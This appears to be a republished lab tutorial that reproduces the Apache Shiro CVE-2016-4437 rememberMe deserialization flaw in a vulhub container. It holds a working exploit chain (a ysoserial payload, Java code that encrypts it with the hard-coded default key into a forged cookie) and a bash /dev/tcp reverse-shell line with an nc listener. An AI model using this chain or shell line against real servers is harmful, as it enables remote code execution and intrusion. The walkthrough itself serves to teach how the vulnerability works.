How to reproduce CVE-2016-4437 (Apache Shiro rememberMe deserialization command execution)

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article walks through reproducing the CVE-2016-4437 deserialization command execution vulnerability in Apache Shiro. The content is fairly detailed; interested readers can follow along, and I hope it is helpful to you.

0x00 Introduction

Apache Shiro is an open source Java security framework that provides authentication, authorization, cryptography, and session management. It is intuitive and easy to use while still offering robust security.

In Apache Shiro 1.2.4 and earlier, the "remember me" user information is serialized, AES-encrypted, Base64-encoded and stored in a cookie named rememberMe. The AES key is a hard-coded default, so an attacker who knows it can forge a rememberMe cookie whose ciphertext decrypts to attacker-controlled serialized data. The server decrypts and deserializes it, triggering a Java deserialization vulnerability and executing arbitrary commands on the target machine.

0x01 Start the environment

cd vulhub/shiro/CVE-2016-4437
docker-compose up -d

Note: the service listens on port 8080. If that conflicts with something already running, change the port mapping in docker-compose.yml.

0x02 Vulnerability analysis

1 Build the test environment

Create a Maven project in IDEA and import the dependencies in pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.example</groupId>
    <artifactId>Shiro</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

    <dependencies>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>compile</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-core</artifactId>
            <version>1.2.4</version>
        </dependency>
    </dependencies>
</project>

shiro-core is obviously required (it also pulls in commons-beanutils, which is what the CommonsBeanutils1 gadget chain used later relies on); junit is only there so the encryption code can be run conveniently as a test.

Project structure:

Note: the path of poc.ser is relative to the project root.

2 Vulnerability analysis

According to the original researcher's write-up, the problem lies in org.apache.shiro.mgt.AbstractRememberMeManager.

Open the source of that class and look at the relevant lines:

Line 26 defines the default key (DEFAULT_CIPHER_KEY_BYTES, the Base64 string kPH+bIxk5D2deZiIxcaaaA==), and the constructor on line 32 assigns that default as the encryption/decryption key.

Line 167 uses that key for AES decryption of the cookie value, so unless the application has overridden it, the key in use is the default one.

To sum up: the AES key is a fixed default, and if developers do not replace it manually, anyone can build the rememberMe cookie themselves. Serialize a gadget chain, AES-encrypt it with the known key, Base64-encode the result and send it as the cookie; the server decrypts it, deserializes the attacker-controlled data and the gadget chain executes, giving a shell. (The fix in Shiro 1.2.5 was to generate a random key at startup instead of shipping a hard-coded one.)

0x03 Vulnerability reproduction

1 Generate the serialized payload with ysoserial (the output is a Java serialization stream, not bytecode):

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser

Copy poc.ser into the project root.

2 Write the code that AES-encrypts the payload with the default key (this is the same AesCipherService Shiro itself uses, so the output has exactly the layout the server expects):

import org.apache.shiro.codec.Base64;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;
import org.junit.Test;

import java.io.IOException;
import java.nio.file.FileSystems;
import java.nio.file.Files;

public class ShiroTest {
    @Test
    public void RCE() throws IOException {
        // poc.ser is the ysoserial output, read relative to the project root
        byte[] payload = Files.readAllBytes(FileSystems.getDefault().getPath(".", "poc.ser"));
        AesCipherService aes = new AesCipherService();
        // Shiro's hard-coded default rememberMe key (AbstractRememberMeManager.DEFAULT_CIPHER_KEY_BYTES)
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
        ByteSource ciphertext = aes.encrypt(payload, key);
        // ByteSource.toString() returns the Base64 form, which is used directly as the cookie value
        System.out.println(ciphertext.toString());
    }
}

3 Replace the cookie: send any request to the target with the printed Base64 string as the value of the rememberMe cookie (Cookie: rememberMe=<printed value>).

4 Enter the Docker container and check the result (docker exec into the container and list /tmp):

File created successfully

5 Reverse shell

1 Craft the command

# reverse shell command; note that there must be no space inside ">&"
bash -i >& /dev/tcp/ip/port 0>&1

This string cannot be passed to ysoserial as-is: the gadget chain ends in Runtime.exec(), which splits on whitespace and runs the tokens directly without a shell, so the redirections are never interpreted. It has to be wrapped in a bash -c form with no spaces inside the arguments, which is what the site below does.

Online conversion website: http://www.jackson-t.ca/runtime-exec-payloads.html

2 Generate the serialized payload with ysoserial using the converted command, and encrypt it into a cookie with the code above.

3 Start an nc listener on the attacking host

# listen for the incoming connection
nc -lvp port

4 Replace the rememberMe cookie with the new value and send the request

5 Check the listener

Nice, the shell came back.

That is all on reproducing the CVE-2016-4437 deserialization command execution vulnerability. I hope the content above is of some help to you and that you can learn more from it. If you found the article useful, feel free to share it so more people can see it.
